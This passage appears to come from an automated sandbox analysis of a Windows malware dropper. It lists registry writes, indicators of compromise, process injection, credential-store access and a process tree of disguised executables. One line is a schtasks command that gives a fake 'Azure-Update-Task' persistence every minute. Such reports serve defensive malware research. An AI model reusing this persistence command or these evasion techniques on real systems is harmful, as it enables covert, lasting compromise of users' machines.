7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 Calculator.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp -
Runs ping.exe 1 TTPs 3 IoCs
Processes:
PING.EXEPING.EXEPING.EXEpid process 6828 PING.EXE 8952 PING.EXE 7320 PING.EXE -
Script User-Agent 13 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 1114 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 316 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1001 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1005 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1046 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1031 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1041 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1067 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1112 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 779 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 962 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 997 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
SmartClock.exepid process 9600 SmartClock.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
CrowdInspect64.exepid process 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe 3212 CrowdInspect64.exe -
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
Processes:
CrowdInspect64.exeexplorer.execmd.exetaskmgr.exepid process 3212 CrowdInspect64.exe 2848 5564 explorer.exe 3036 cmd.exe 1508 taskmgr.exe -
Suspicious behavior: MapViewOfSection 29 IoCs
Processes:
cmd.exe6PzDKqTumYc6wQmCZmE1EFMz.exeF30D.exeyoX1lbJjB0CYEqqcW6Y2Yb_p.exe70E5.exeConhost.exeMicrosoftEdgeCP.execmd.exeexplorer.exedcfbdigtrfbdigMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedcfbdigtrfbdigpid process 2116 cmd.exe 5492 6PzDKqTumYc6wQmCZmE1EFMz.exe 6900 F30D.exe 2704 yoX1lbJjB0CYEqqcW6Y2Yb_p.exe 10152 70E5.exe 8260 Conhost.exe 10056 MicrosoftEdgeCP.exe 10056 MicrosoftEdgeCP.exe 8368 cmd.exe 8368 cmd.exe 8368 cmd.exe 8368 cmd.exe 8368 cmd.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 8124 dcfbdig 9568 trfbdig 8836 MicrosoftEdgeCP.exe 8836 MicrosoftEdgeCP.exe 8836 MicrosoftEdgeCP.exe 8836 MicrosoftEdgeCP.exe 10896 MicrosoftEdgeCP.exe 10896 MicrosoftEdgeCP.exe 9424 MicrosoftEdgeCP.exe 9424 MicrosoftEdgeCP.exe 6176 dcfbdig 5968 trfbdig -
Suspicious behavior: SetClipboardViewer 4 IoCs
Processes:
1104282.exe6670411.exe7590801.execmd.exepid process 5912 1104282.exe 6172 6670411.exe 7064 7590801.exe 3036 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
CrowdInspect64.exedescription pid process Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe Token: SeDebugPrivilege 3212 CrowdInspect64.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Sat1481f5a7e3eccdd.tmpexplorer.exesetting.exeinstaller.exeDrvInst.exeCalculator.exepid process 4380 Sat1481f5a7e3eccdd.tmp 2848 2848 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5064 setting.exe 7836 installer.exe 5564 explorer.exe 5564 explorer.exe 8004 DrvInst.exe 3388 Calculator.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
explorer.exepid process 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
ha.exeCrowdInspect64.exesetup_x86_x64_install.exesetup_installer.exesetup_install.exeSat142ac5249376e895.exeSat14514904a4b.exeSat142b09ae40c44cf.exeSat1481f5a7e3eccdd.exeSat14b47e86b9c16b.exeSat1481f5a7e3eccdd.tmpSat1481f5a7e3eccdd.exeSat1481f5a7e3eccdd.tmpwerfault.exesearch_hyperfs_206.exesetup.exeCalculator Installation.exepostback.exe7PeayF9Tb5XcknwhFlZFItg1.exeHucq3cRU783T_YaR6f0rcMBe.exeBeNlWgh16GLAdiYLOwOe1lqZ.exe1luUodQBKunwgCepAZE5m_rN.exeKnv5tLGcITqzriOiFtbYIHkp.exeghyLwzsW68yJrRDdcOnQsReb.executm3.exeinst3.exebuild.exedBfLigPnGbkVroMLScuPczOh.exe7536159.exeGKWt8jAAi7IwCqNCN3FGm_q4.exeGKWt8jAAi7IwCqNCN3FGm_q4.tmpsetup.exeVQkGBnO_XmTtKCVqhBHSUro2.exepowershell.exeue41KJ_oVzM77L8GxPePgl1A.exeBMameXGTyFCpxcZ9otZTnGuy.exe45McdKh4yEN6rqCKY0ZuGRQk.exeConhost.exe4sJmy4OYqmAdZtWjrOficbSi.exeI1yxyBjCi2rjqqaotCgEwtTy.exeVo1z98SLibb53bBUs5I2fSxG.exeaDm5wtNVVBVZLktXPpIsLYMC.exeaDm5wtNVVBVZLktXPpIsLYMC.tmpsetup.exe7432933.exeSearchUI.exeShellExperienceHost.exeX9CrMOGrOpPKIZqgtV8aNLBI.exevon6J2rHI2UgQky674Td90lo.exe6199182.exeexplorer.exeMicrosoftEdge.exeany.execustomer51.exesetup.exeFastPC.exeFastPC.exeDrvInst.exeautosubplayer.exepowershell.exeMicrosoftEdgeCP.exe8217699.exepid process 2588 ha.exe 2588 ha.exe 3212 CrowdInspect64.exe 1044 setup_x86_x64_install.exe 2176 setup_installer.exe 3120 setup_install.exe 3628 Sat142ac5249376e895.exe 512 Sat14514904a4b.exe 3624 Sat142b09ae40c44cf.exe 2164 Sat1481f5a7e3eccdd.exe 1112 Sat14b47e86b9c16b.exe 1412 Sat1481f5a7e3eccdd.tmp 4200 Sat1481f5a7e3eccdd.exe 4380 Sat1481f5a7e3eccdd.tmp 4928 werfault.exe 2184 search_hyperfs_206.exe 5028 setup.exe 2336 Calculator Installation.exe 1472 postback.exe 5804 7PeayF9Tb5XcknwhFlZFItg1.exe 6052 Hucq3cRU783T_YaR6f0rcMBe.exe 3076 BeNlWgh16GLAdiYLOwOe1lqZ.exe 2204 1luUodQBKunwgCepAZE5m_rN.exe 2684 Knv5tLGcITqzriOiFtbYIHkp.exe 5132 ghyLwzsW68yJrRDdcOnQsReb.exe 5640 cutm3.exe 2584 inst3.exe 5692 build.exe 6732 dBfLigPnGbkVroMLScuPczOh.exe 5880 7536159.exe 3908 GKWt8jAAi7IwCqNCN3FGm_q4.exe 3972 GKWt8jAAi7IwCqNCN3FGm_q4.tmp 3752 setup.exe 5216 VQkGBnO_XmTtKCVqhBHSUro2.exe 2796 powershell.exe 2212 ue41KJ_oVzM77L8GxPePgl1A.exe 2404 BMameXGTyFCpxcZ9otZTnGuy.exe 6692 45McdKh4yEN6rqCKY0ZuGRQk.exe 6516 Conhost.exe 6336 4sJmy4OYqmAdZtWjrOficbSi.exe 6184 I1yxyBjCi2rjqqaotCgEwtTy.exe 5764 Vo1z98SLibb53bBUs5I2fSxG.exe 3244 aDm5wtNVVBVZLktXPpIsLYMC.exe 5192 aDm5wtNVVBVZLktXPpIsLYMC.tmp 6268 setup.exe 7076 7432933.exe 2476 SearchUI.exe 3224 ShellExperienceHost.exe 3224 ShellExperienceHost.exe 7480 X9CrMOGrOpPKIZqgtV8aNLBI.exe 7548 von6J2rHI2UgQky674Td90lo.exe 5768 6199182.exe 5564 explorer.exe 2780 MicrosoftEdge.exe 6868 any.exe 8268 customer51.exe 8208 setup.exe 8668 FastPC.exe 5932 FastPC.exe 8004 DrvInst.exe 9348 autosubplayer.exe 10040 powershell.exe 9420 MicrosoftEdgeCP.exe 9756 8217699.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1044 wrote to memory of 2176 1044 setup_x86_x64_install.exe setup_installer.exe PID 1044 wrote to memory of 2176 1044 setup_x86_x64_install.exe setup_installer.exe PID 1044 wrote to memory of 2176 1044 setup_x86_x64_install.exe setup_installer.exe PID 2176 wrote to memory of 3120 2176 setup_installer.exe setup_install.exe PID 2176 wrote to memory of 3120 2176 setup_installer.exe setup_install.exe PID 2176 wrote to memory of 3120 2176 setup_installer.exe setup_install.exe PID 3120 wrote to memory of 3880 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3880 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3880 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 2504 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 2504 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 2504 3120 setup_install.exe cmd.exe PID 3880 wrote to memory of 1484 3880 cmd.exe powershell.exe PID 3880 wrote to memory of 1484 3880 cmd.exe powershell.exe PID 3880 wrote to memory of 1484 3880 cmd.exe powershell.exe PID 2504 wrote to memory of 3036 2504 cmd.exe powershell.exe PID 2504 wrote to memory of 3036 2504 cmd.exe powershell.exe PID 2504 wrote to memory of 3036 2504 cmd.exe powershell.exe PID 3120 wrote to memory of 3168 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3168 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3168 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 420 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 420 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 420 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3216 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3216 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3216 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 2040 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 2040 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 2040 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 1824 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 1824 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 1824 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 1304 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 1304 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 1304 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3892 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3892 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3892 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 2420 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 2420 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 2420 3120 setup_install.exe cmd.exe PID 3168 wrote to memory of 3848 3168 cmd.exe Sat14f1396dfcf191bd.exe PID 3168 wrote to memory of 3848 3168 cmd.exe Sat14f1396dfcf191bd.exe PID 2040 wrote to memory of 1108 2040 cmd.exe Sat14d32a38896785b13.exe PID 2040 wrote to memory of 1108 2040 cmd.exe Sat14d32a38896785b13.exe PID 3120 wrote to memory of 3632 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3632 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3632 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3524 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3524 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3524 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 1020 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 1020 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 1020 3120 setup_install.exe cmd.exe PID 1824 wrote to memory of 4044 1824 cmd.exe Sat14febbc433.exe PID 1824 wrote to memory of 4044 1824 cmd.exe Sat14febbc433.exe PID 1824 wrote to memory of 4044 1824 cmd.exe Sat14febbc433.exe PID 3120 wrote to memory of 3100 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3100 3120 setup_install.exe cmd.exe PID 3120 wrote to memory of 3100 3120 setup_install.exe cmd.exe PID 3216 wrote to memory of 512 3216 cmd.exe Sat14514904a4b.exe PID 3216 wrote to memory of 512 3216 cmd.exe Sat14514904a4b.exe PID 420 wrote to memory of 3624 420 cmd.exe Sat142b09ae40c44cf.exe -
outlook_office_path 1 IoCs
Processes:
Settings.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Settings.exe -
outlook_win_path 1 IoCs
Processes:
Settings.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Settings.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\trfbdigC:\Users\Admin\AppData\Roaming\trfbdig2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\dcfbdigC:\Users\Admin\AppData\Roaming\dcfbdig2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\fgfbdigC:\Users\Admin\AppData\Roaming\fgfbdig2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\fgfbdigC:\Users\Admin\AppData\Roaming\fgfbdig3⤵
-
C:\Users\Admin\AppData\Roaming\safbdigC:\Users\Admin\AppData\Roaming\safbdig2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 4763⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\trfbdigC:\Users\Admin\AppData\Roaming\trfbdig2⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\fgfbdigC:\Users\Admin\AppData\Roaming\fgfbdig2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\fgfbdigC:\Users\Admin\AppData\Roaming\fgfbdig3⤵
-
C:\Users\Admin\AppData\Roaming\dcfbdigC:\Users\Admin\AppData\Roaming\dcfbdig2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exeC:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exeC:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task3⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
